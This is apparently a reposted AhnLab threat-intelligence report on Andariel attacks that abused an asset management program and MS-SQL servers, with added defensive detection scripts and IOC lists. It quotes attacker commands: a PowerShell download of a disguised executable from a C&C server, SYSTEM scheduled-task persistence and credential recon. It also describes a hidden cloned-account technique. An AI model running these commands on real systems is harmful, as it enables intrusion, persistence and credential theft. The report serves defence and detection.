Circumstances of an Attack Exploiting an Asset Management Program (Andariel Group)

by Prapattimynk, Tuesday, 21 November 2023

The ASEC analysis team identified evidence of the Andariel group distributing malware through an attack that abused a certain asset management program. The Andariel group is assessed to cooperate with, or be a sub-group of, the Lazarus group.

The Andariel group usually gains initial access through spear phishing, watering hole, or supply chain attacks, and in at least one case abused a central management solution during malware installation. Recently, the group has exploited vulnerabilities such as Log4Shell and flaws in Innorix Agent to attack targets across corporate sectors in South Korea. [1]

The recently identified attack abused a different asset management program, and an attack against MS-SQL Server was identified at the same time. The malware installed through these attacks includes not only TigerRat but also NukeSped variants, Black RAT, and Lilith RAT, an open-source malware strain. As in previous cases, the targets were South Korean communications companies and semiconductor manufacturers.

1. Initial Penetration

AhnLab Smart Defense (ASD) recently detected logs showing a certain South Korean asset management program installing the Andariel group’s malware. These logs alone do not show whether the program was exploited through a vulnerability or simply abused through its legitimate functions. Either way, the asset management program running on the target system ultimately executed the following PowerShell command to download the malware (wget is a PowerShell alias of Invoke-WebRequest; note that the payload is served with an image extension and written as an executable into the world-writable C:\Users\Public directory).

Figure 1. Malware downloaded using an asset management program
  • PowerShell command: wget hxxp://109.248.150[.]147:8585/load.png -outfile C:\Users\public\credis.exe

Besides PowerShell, the Andariel group also used mshta.exe to download malware. The following is the HTML downloader script hosted on the C&C server (load.html in the IOC list below); it is responsible for downloading other Andariel strains such as TigerRat.

Figure 2. Downloader script

In previous cases, the Andariel group used Innorix Agent exploitation and spear phishing together. What stands out in the recent attacks is that malware was in some cases installed through MS-SQL Server. The threat actor presumably attacked poorly managed MS-SQL servers and installed NukeSped. This presumption rests on two observations: malware such as Remcos RAT and Mallox ransomware is routinely installed through attacks on MS-SQL servers whose account credentials are weak enough to fall to brute-force or dictionary attacks, and the same systems carry logs of other threat actors having previously attempted to install such malware. The Andariel group therefore appears to have recently added poorly managed MS-SQL servers to its set of attack vectors.

Figure 3. NukeSped being installed through MS-SQL Server

As in other attacks targeting MS-SQL Server, PrintSpoofer was used for privilege escalation. PrintSpoofer abuses SeImpersonatePrivilege, which the MS-SQL service account typically holds, to obtain a SYSTEM token; compromising the database service account is therefore enough to reach full control of the host.

Figure 4. PrintSpoofer privilege escalation malware also used in the attack against MS-SQL Server

2. Malware Used in Attacks

Backdoors installed through the attacks above include TigerRat, a major malware strain of the Andariel group, as well as Black RAT and NukeSped variants. These are nearly identical to those seen in previous attacks; what is new is the use of the open-source Lilith RAT. Additionally, in line with the group’s recent tendency to develop malware in Go, a Go-based downloader was also discovered.

2.1. TigerRat

The malware installed through the South Korean asset management program was TigerRat. The Andariel group has used TigerRat in most of its attacks against South Korean targets, including watering hole attacks and Log4Shell exploitation. [2] TigerRat is a backdoor that supports uploading and downloading files, executing commands, collecting basic system information, keylogging, taking screenshots, and port forwarding.

Unlike ordinary backdoors, TigerRat performs an authentication step at the start of each C&C session: the client must send a fixed string and receive a fixed string in return. As in the samples identified in 2023, the recent samples use 0x20-byte strings for this step; they appear to be the MD5 hashes of “fool” (dd7b696b96434d2bf07b34f9c125d51d) and “iwan” (01ccce480c60fcdb67b54f4509ffdb56). Because the pair is constant within a sample, it can serve as a network signature for that build.

Figure 5. Strings used in authentication with the C&C server
  • C&C request string: dd7b696b96434d2bf07b34f9c125d51d
  • C&C response string: 01ccce480c60fcdb67b54f4509ffdb56
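As an added example that is not part of the original analysis, the handshake described above can be turned into a small session classifier. It assumes the tokens travel in plaintext as 32 ASCII hex characters (the page gives their size as 0x20 but does not say whether the channel is additionally wrapped in TLS); the sample sessions are constructed. The helper that recomputes MD5("fool") and MD5("iwan") is there so you can confirm the page’s claim yourself rather than take the mapping on faith.

```python
import hashlib
import re

# Handshake tokens reported on this page (0x20 = 32 ASCII hex characters each).
TIGERRAT_REQUEST = b"dd7b696b96434d2bf07b34f9c125d51d"
TIGERRAT_RESPONSE = b"01ccce480c60fcdb67b54f4509ffdb56"
TOKEN_LEN = 0x20
HEX_TOKEN = re.compile(rb"\A[0-9a-f]{32}\Z")


def md5_hex(word: str) -> str:
    return hashlib.md5(word.encode("ascii")).hexdigest()


def page_tokens_match_words() -> dict[str, bool]:
    """Recompute the page's claim that the tokens are MD5('fool') and MD5('iwan')."""
    return {
        "fool": md5_hex("fool").encode() == TIGERRAT_REQUEST,
        "iwan": md5_hex("iwan").encode() == TIGERRAT_RESPONSE,
    }


def classify_session(client_first: bytes, server_first: bytes) -> str:
    """Classify a TCP session from the first bytes each side sent.

    'tigerrat'                : both 0x20-byte tokens match the pair reported on the page
    'unknown-token-handshake' : a bare 32-hex-char token in each direction before any
                                protocol banner (heuristic; worth a look, not a conviction)
    'benign'                  : anything else
    """
    c = client_first[:TOKEN_LEN]
    s = server_first[:TOKEN_LEN]
    if c == TIGERRAT_REQUEST and s == TIGERRAT_RESPONSE:
        return "tigerrat"
    if HEX_TOKEN.match(c) and HEX_TOKEN.match(s):
        return "unknown-token-handshake"
    return "benign"


# Constructed sample sessions: (first bytes from client, first bytes from server).
SAMPLE_SESSIONS = {
    "ep1": (TIGERRAT_REQUEST + b"\x10\x00\x00\x00", TIGERRAT_RESPONSE + b"\x01"),
    "ep2": (b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n", b"HTTP/1.1 200 OK\r\n"),
    "ep3": (b"0" * 32, b"f" * 32),
}


def triage(sessions: dict) -> dict[str, str]:
    return {name: classify_session(c, s) for name, (c, s) in sessions.items()}


if __name__ == "__main__":
    print(page_tokens_match_words())
    for name, verdict in triage(SAMPLE_SESSIONS).items():
        print(name, verdict)
```

In practice you would feed this the first client and server payloads of each flow from a capture or an EDR network event; the tokens will differ between builds, so treat the constants as per-sample indicators rather than a family signature.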

2.2. Golang Downloader

The Andariel group has been creating and using various Go-based backdoors since around 2023. Black RAT, Goat RAT, and DurianBeacon were used in previous cases, and a Go-based downloader was used in the recent attacks. The malware has a simple structure: it connects to the C&C server and installs an additional payload. A notable characteristic is that it Base64-encodes its C&C traffic; Base64 is an encoding, not encryption, so it hides the content from casual inspection but provides no confidentiality.

Figure 6. The downloader malware’s Base64 decoding routine

Not only did the threat actor exploit the South Korean asset management program to install TigerRat directly, but they also employed the method of installing the Golang downloader which in turn installed an additional payload. Malware installed through the Golang downloader include TigerRat and variants of NukeSped.

2.3. NukeSped Variants

NukeSped is a backdoor that receives commands from the C&C server and controls the infected system. Among the NukeSped variants used in the attacks, Type 1 sends a POST request during the initial C&C communication and then returns the results of the commands received from the C&C server in GET requests disguised as visits to Google.

Figure 7. C&C communications packet

Another NukeSped variant was identified in the attack process. Although it is only 23 KB, its self-deletion command string resembles that of past NukeSped variants.

Figure 8. NukeSped’s string

2.4. Black RAT

Black RAT is a backdoor developed in Go and was first identified in an Andariel group attack in 2023. Although the Black RAT sample from the recent attacks contains no source-path information, it could be identified by function names nearly identical to those of the earlier Black RAT.

Figure 9. List of Black RAT’s functions

2.5. Lilith RAT

Lilith RAT is an open-source RAT malware published on GitHub. It was developed in C++ and provides various features for controlling the infected system such as remote code execution, maintaining persistence, and auto-delete.

Figure 10. Lilith RAT’s GitHub page

The Lilith RAT used by the Andariel group has a significant portion of the strings in its binary encrypted, presumably to evade file-based detection. Not all strings are encrypted, however, and some are identical to those in Lilith RAT’s public source code.

Figure 11. Strings in Lilith RAT

2.6. Adding User Account

Aside from controlling the infected system through backdoors, the threat actor also added a user account to the system and concealed it. This was done with a malware strain the threat actor developed. Because the malware runs properly only when a particular user account already exists on the infected system, its use implies that the threat actor had already gained control of the system.

Figure 12. The routine that diverges depending on the existence of a certain user

The usual reasons a threat actor adds a user account even though a backdoor already gives control are to operate the target over Remote Desktop in a GUI session and to retain access afterward. An account added without further steps, however, is easy to notice: a newly created user appears at the next login.

For this reason, the malware takes the following steps to keep the user from noticing. First, the account is created with a “$” appended to its name; Windows omits such names from net user output. Then part of an existing user’s SAM entry is copied over the entry of the new “black$” account. If the existing user is an administrator permitted to use Remote Desktop, “black$” inherits the same properties. The account nevertheless remains visible in the SAM hive and in Local Users and Groups, and its creation still produces the normal account-creation event (Event ID 4720) when done through the standard API, so those remain viable detection points.

For reference, malware used by the Kimsuky group added the newly created account to the administrators group and to the SpecialAccounts registry key (which hides it from the logon screen) and allowed it through the firewall. [3] Those steps are easy for security products to detect, whereas the Andariel group characteristically used the malware described above to add a concealed account without them.

Figure 13. Kimsuky group’s malware that adds and conceals a user account
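One way to hunt for the cloned, “$”-suffixed account described in the previous two sections, as an added example and not AhnLab’s or the malware’s code: the script below takes account names, RID key names and raw F values already extracted from the SAM hive (for example by a registry parser run over an offline copy, since the live hive is readable only by SYSTEM) and applies three independent checks. The location of the RID inside the F value (offset 0x30) is my assumption and is not stated on the page; the user “alice” and the blob contents are constructed.

```python
import struct
from dataclasses import dataclass

# Assumption, not stated on the page: the SAM user "F" value carries the account's
# RID as a little-endian DWORD at offset 0x30. The sample blobs below are constructed.
F_RID_OFFSET = 0x30
F_SIZE = 0x50


@dataclass(frozen=True)
class SamUser:
    name: str       # from SAM\Domains\Account\Users\Names\<name>
    key: str        # subkey name under SAM\Domains\Account\Users: the RID in hex
    f_value: bytes  # raw "F" value of that subkey


def make_f(rid: int) -> bytes:
    """Constructed minimal F blob: zeros except for the embedded RID."""
    blob = bytearray(F_SIZE)
    struct.pack_into("<I", blob, F_RID_OFFSET, rid)
    return bytes(blob)


def embedded_rid(f_value: bytes) -> int:
    return struct.unpack_from("<I", f_value, F_RID_OFFSET)[0]


def find_shadow_accounts(users: list[SamUser]) -> list[tuple[str, str]]:
    """Three independent checks; a cloned hidden account trips all of them."""
    findings = []
    seen_f: dict[bytes, str] = {}
    for u in users:
        # 1. The "$" suffix hides the name from 'net user', but not from the hive.
        if u.name.endswith("$"):
            findings.append((u.name, "name ends in '$': omitted from 'net user' output"))
        # 2. An F value copied from another account still carries that account's RID.
        key_rid = int(u.key, 16)
        rid_in_f = embedded_rid(u.f_value)
        if rid_in_f != key_rid:
            findings.append((u.name, f"F value embeds RID {rid_in_f} but the key is RID {key_rid}"))
        # 3. Two accounts should never share a byte-identical F value.
        owner = seen_f.setdefault(u.f_value, u.name)
        if owner != u.name:
            findings.append((u.name, f"F value is byte-identical to that of '{owner}'"))
    return findings


SAMPLE_USERS = [
    SamUser("Administrator", "000001F4", make_f(500)),
    SamUser("alice", "000003E9", make_f(1001)),   # constructed ordinary user
    SamUser("black$", "000003EA", make_f(500)),   # F copied from RID 500, as described on this page
]


if __name__ == "__main__":
    for name, why in find_shadow_accounts(SAMPLE_USERS):
        print(f"{name}: {why}")
```

Check 2 is the strongest of the three: a “$” suffix is also used by legitimate machine accounts on domain members, and a byte-identical F value only shows up if you happen to have both accounts in the same export, but an RID inside the F value that disagrees with the key name has no legitimate explanation.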

3. Post Infection

After installing the backdoor, the threat actor ran the following commands to register it with the task scheduler for persistence: any existing task of the same name is deleted, a new task is created that runs credis.exe (TigerRat, per the IOC list) as SYSTEM at every logon, and the task is then started immediately.

Figure 14. Commands executed by the threat actor
> schtasks /delete /tn “microsoft******” /f
> schtasks /create /tn “microsoft******” /tr “c:\users\%ASD%\credis.exe” /sc onlogon /ru system
> schtasks /run /tn “microsoftwindowsmuiroute”

Afterward, the following commands were used to look up information on the infected system.

> cmd.exe /c “query user”
> cmd.exe /c “ipconfig”
> cmd.exe /c “whoami”
> cmd.exe /c “cmdkey /list”
> cmd.exe /c “netsat -nao | findstr 445”

Besides the commands above, other commands deleted the downloader (perf.exe, which the IOC list ties to the Golang downloader and NukeSped Type 2) and terminated a process.

> cmd.exe /c “del /f c:\users\%ASD%\perf.exe”
> taskkill /f /pid 15036
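The PowerShell and mshta download commands in section 1 and the schtasks persistence and reconnaissance commands above share one property: each is a single process-creation event whose command line is enough to flag it, and the recon commands, harmless one at a time, become suspicious when several distinct ones are spawned by the same parent within a short window. The following is an added example, my code rather than AhnLab’s or the attacker’s, that applies those rules to constructed process-creation events modelled on the commands this page reports. The sample events use the documentation address 203.0.113.10 instead of the real C&C, keep the page’s %ASD% redaction as-is, and the rule names and the cluster threshold (three distinct recon commands within 300 seconds) are my assumptions.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Command-line patterns. "wget", "iwr" and "curl" are PowerShell aliases of Invoke-WebRequest.
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
OUTFILE_RE = re.compile(r"-outfile\s+([^\s\"']+)", re.I)
DOWNLOADER_RE = re.compile(r"\b(wget|iwr|curl|invoke-webrequest)\b", re.I)
MSHTA_RE = re.compile(r"\bmshta(\.exe)?\b", re.I)
WORLD_WRITABLE_RE = re.compile(r"\\users\\public\\|\\programdata\\|\\windows\\temp\\", re.I)
SCHTASKS_SYSTEM_RE = re.compile(r"schtasks.*?/create.*?/ru\s+system", re.I | re.S)
USER_PROFILE_RE = re.compile(r"[a-z]:\\users\\", re.I)
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif", ".ico", ".bmp"}
RECON_PATTERNS = {  # each is benign alone; the cluster is what matters
    "query user": re.compile(r"\bquery\s+user\b", re.I),
    "cmdkey /list": re.compile(r"\bcmdkey\s+/list\b", re.I),
    "whoami": re.compile(r"\bwhoami\b", re.I),
    "ipconfig": re.compile(r"\bipconfig\b", re.I),
    "smb port check": re.compile(r"\bfindstr\s+445\b", re.I),
}


def triage_command(cmdline: str) -> list[str]:
    """Return the rule names a single process command line trips."""
    hits = []
    url = URL_RE.search(cmdline)
    out = OUTFILE_RE.search(cmdline)
    if url and DOWNLOADER_RE.search(cmdline):
        hits.append("remote-download")
        if out:
            dest = out.group(1)
            if WORLD_WRITABLE_RE.search(dest):
                hits.append("download-to-world-writable-dir")
            # load.png saved as credis.exe: served as an image, written as an executable
            src_ext = posixpath.splitext(urlsplit(url.group(0)).path)[1].lower()
            if src_ext in IMAGE_EXTS and dest.lower().endswith(".exe"):
                hits.append("exe-fetched-as-image")
    if url and MSHTA_RE.search(cmdline):
        hits.append("mshta-remote-content")
    if SCHTASKS_SYSTEM_RE.search(cmdline):
        hits.append("system-task-created")
        if USER_PROFILE_RE.search(cmdline):
            hits.append("system-task-runs-from-user-profile")
    for name, pat in RECON_PATTERNS.items():
        if pat.search(cmdline):
            hits.append(f"recon:{name}")
    return hits


def triage_events(events: list[dict], window_s: int = 300, min_recon_kinds: int = 3) -> dict:
    """Per-process hits plus recon clusters: at least min_recon_kinds distinct recon
    commands spawned by the same parent within window_s seconds."""
    per_process = {e["pid"]: triage_command(e["cmdline"]) for e in events}
    recon_by_parent = defaultdict(list)
    for e in events:
        kinds = [h for h in per_process[e["pid"]] if h.startswith("recon:")]
        if kinds:
            recon_by_parent[e["ppid"]].append((e["ts"], kinds))
    clusters = []
    for ppid, items in recon_by_parent.items():
        items.sort()
        kinds = sorted({k.split(":", 1)[1] for _, ks in items for k in ks})
        span = items[-1][0] - items[0][0]
        if len(kinds) >= min_recon_kinds and span <= window_s:
            clusters.append({"ppid": ppid, "kinds": kinds, "span_s": span})
    return {"per_process": per_process, "recon_clusters": clusters}


# Constructed process-creation events modelled on the commands reported on this page.
# 203.0.113.10 is a documentation address, not the real C&C; %ASD% is the page's redaction.
SAMPLE_EVENTS = [
    {"ts": 0, "pid": 4001, "ppid": 3000, "cmdline":
     "powershell wget http://203.0.113.10:8585/load.png -outfile C:\\Users\\public\\credis.exe"},
    {"ts": 5, "pid": 4002, "ppid": 3000, "cmdline": "mshta http://203.0.113.10:8585/load.html"},
    {"ts": 60, "pid": 4010, "ppid": 4005, "cmdline":
     'schtasks /create /tn "microsoft******" /tr "c:\\users\\%ASD%\\credis.exe" /sc onlogon /ru system'},
    {"ts": 70, "pid": 4011, "ppid": 4005, "cmdline": 'cmd.exe /c "query user"'},
    {"ts": 71, "pid": 4012, "ppid": 4005, "cmdline": 'cmd.exe /c "whoami"'},
    {"ts": 75, "pid": 4013, "ppid": 4005, "cmdline": 'cmd.exe /c "cmdkey /list"'},
    {"ts": 80, "pid": 4014, "ppid": 4005, "cmdline": 'cmd.exe /c "netstat -nao | findstr 445"'},
    {"ts": 90, "pid": 9001, "ppid": 9000, "cmdline": "ipconfig /all"},  # lone benign recon
]


if __name__ == "__main__":
    result = triage_events(SAMPLE_EVENTS)
    for pid, hits in result["per_process"].items():
        if hits:
            print(pid, hits)
    print(result["recon_clusters"])
```

On a real host the events come from Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing enabled; the parent-process grouping is what separates an operator working through a backdoor’s shell from an administrator who happens to run ipconfig once.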

In addition to collecting information through the backdoor, the threat actor downloaded and ran the NirSoft tools CredentialsFileView and Network Password Recovery. These display credentials saved on the infected system, including those stored for network shares, which can later be used for lateral movement within the affected organization’s network.

Figure 15. Netpass downloaded and executed after malware infection

4. Conclusion

The Andariel group is one of the threat groups that are highly active in South Korea, alongside the Kimsuky and Lazarus groups. The group initially launched attacks to acquire information related to national security, but now they are also attacking for financial gain. [4] They are known to use spear phishing or watering hole attacks, and they also exploit vulnerabilities in software during the initial penetration. There have also been circumstances of the Andariel group having exploited other vulnerabilities in the attack process to distribute malware.

In the recently discovered cases, the group appears to be abusing programs deployed inside companies, such as asset management software, as a supply-chain-style vector, in addition to attacking vulnerable MS-SQL servers. Users must be particularly cautious about attachments in emails from unknown sources and executables downloaded from web pages. Security administrators must step up monitoring of asset management programs and patch any security vulnerabilities in them. The latest patches for the OS and programs such as Internet browsers must be applied, and V3 must be updated to the latest version to prevent malware infection in advance.

AhnLab’s anti-malware product V3 detects and blocks malware using the detection names below. The IOC is as follows.

Figure 16. V3 detection result

File Detection
– Malware/Win.Generic.C5528992 (2023.10.25.00)
– Malware/Win.Generic.C5528516 (2023.10.26.00)
– Backdoor/Win.TigerRAT.C5517634 (2023.10.19.03)
– Backdoor/Win.Agent.C5518308 (2023.10.20.00)
– Downloader/HTML.Agent.SC193459 (2023.10.19.03)
– Downloader/HTML.Agent.SC193403 (2023.10.18.01)
– Backdoor/Win.TigerRAT.C5513095 (2023.10.17.03)
– Unwanted/Win.HackTool.C5175443 (2022.06.20.02)
– HackTool/Win.CredentialsFileView (2022.04.20.00)
– Backdoor/Win.Agent.R619279 (2023.11.01.01)
– Backdoor/Win.Agent.C5534745 (2023.11.01.01)
– Backdoor/Win.NukeSped.C5535346 (2023.11.01.03)
– Backdoor/Win.BlackRAT.C5535345 (2023.11.01.03)
– Exploit/Win.PrintSpoofer.C5535350 (2023.11.02.00)

Behavior Detection
– Malware/MDP.Download.M1197

IOC
MD5

– 13b4ce1fc26d400d34ede460a8530d93: TigerRat (credisvs.exe, credis.exe)
– 41895c5416fdc82f7e0babc6bb6c7216: TigerRat (credisvs.exe)
– c2f8c9bb7df688d0a7030a96314bb493: TigerRat (crec.exe, dbinfo.exe)
– 33a3da2de78418b89a603e28a1e8852c: TigerRat (mltest.exe)
– 4896da30a745079cd6265b6332886d45: Lilith RAT (svchost.exe, secure.exe, test.exe)
– 73eb2f4f101aab6158c615094f7a632a: NukeSped variant – Type 1 (system.exe, credisvc.exe)
– 7f33d2d2a2ce9c195202acb59de31eee: NukeSped variant – Type 1 (mshelp.exe)
– e1afd01400ef405e46091e8ef10c721c: NukeSped variant – Type 1 (msuser.exe)
– fe25c192875ec1914b8880ea3896cda2: NukeSped variant – Type 1 (credisvc.exe)
– 232586f8cfe82b80fd0dfa6ed8795c56: NukeSped variant – Type 2 (perf.exe)
– c1f266f7ec886278f030e7d7cd4e9131: Black RAT (winsta.exe)
– 49bb2ad67a8c5dfbfe8db2169e6fa46e: Golang downloader (perf.exe)
– beb199b15bd075996fa8d6a0ed554ca8: Golang downloader (credisvc.exe)
– 4053ca3e37ed1f8d37b29eed61c2e729: Malware for adding user account (test.exe)
– 3a0c8ae783116c1840740417c4fbe678: Malware for adding user account (test.exe)
– 0414a2ab718d44bf6f7103cff287b312: PrintSpoofer (print.exe)
– ca564428a29faf1a613f35d9fa36313f: Network Password Recovery – NirSoft (net.exe)
– ad6d4eb34d29e350f96dc8df6d8a092e: CredentialsFileView – NirSoft (credentialsfileview.exe)
– dc70dc9845aa747001ebf2a02467c203: Downloader script
– 3d2ec58f37c8176e0dbcc47ff93e5a76: Downloader script

C&C URLs
– 27.102.115[.]207:8088: Black RAT, NukeSped variant Type 2
– 27.102.118[.]204:8081: Golang downloader
– 84.38.132[.]67:8443: NukeSped variant Type 1, Lilith RAT
– 109.248.150[.]147:443: TigerRat
– 109.248.150[.]147:8080: TigerRat
– 109.248.150[.]147:8443: TigerRat
– 185.29.8[.]108:443: TigerRat
– 185.29.8[.]108:3443: TigerRat
– 185.29.8[.]108:4443: TigerRat
– 185.29.8[.]108:8080: TigerRat
– 185.29.8[.]108:8081: Golang downloader
– 185.29.8[.]108:8443: TigerRat, NukeSped variant Type 1

Download URLs
– hxxp://27.102.128[.]152:8098/load.png: TigerRat
– hxxp://27.102.118[.]204:6099/fav.ico: Golang downloader
– hxxp://84.38.132[.]67:9479/fav.ico: User Adder, Lilith RAT
– hxxp://84.38.132[.]67:9479/netpass.png: Network Password Recovery – NirSoft
– hxxp://109.248.150[.]147:8585/load.png: TigerRat
– hxxp://109.248.150[.]147:8585/load.html: Downloader script
– hxxp://109.248.150[.]147:8585/view.php: TigerRat
– hxxp://185.29.8[.]108:8585/load.html: Downloader script
– hxxp://185.29.8[.]108:8585/view.php: TigerRat

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
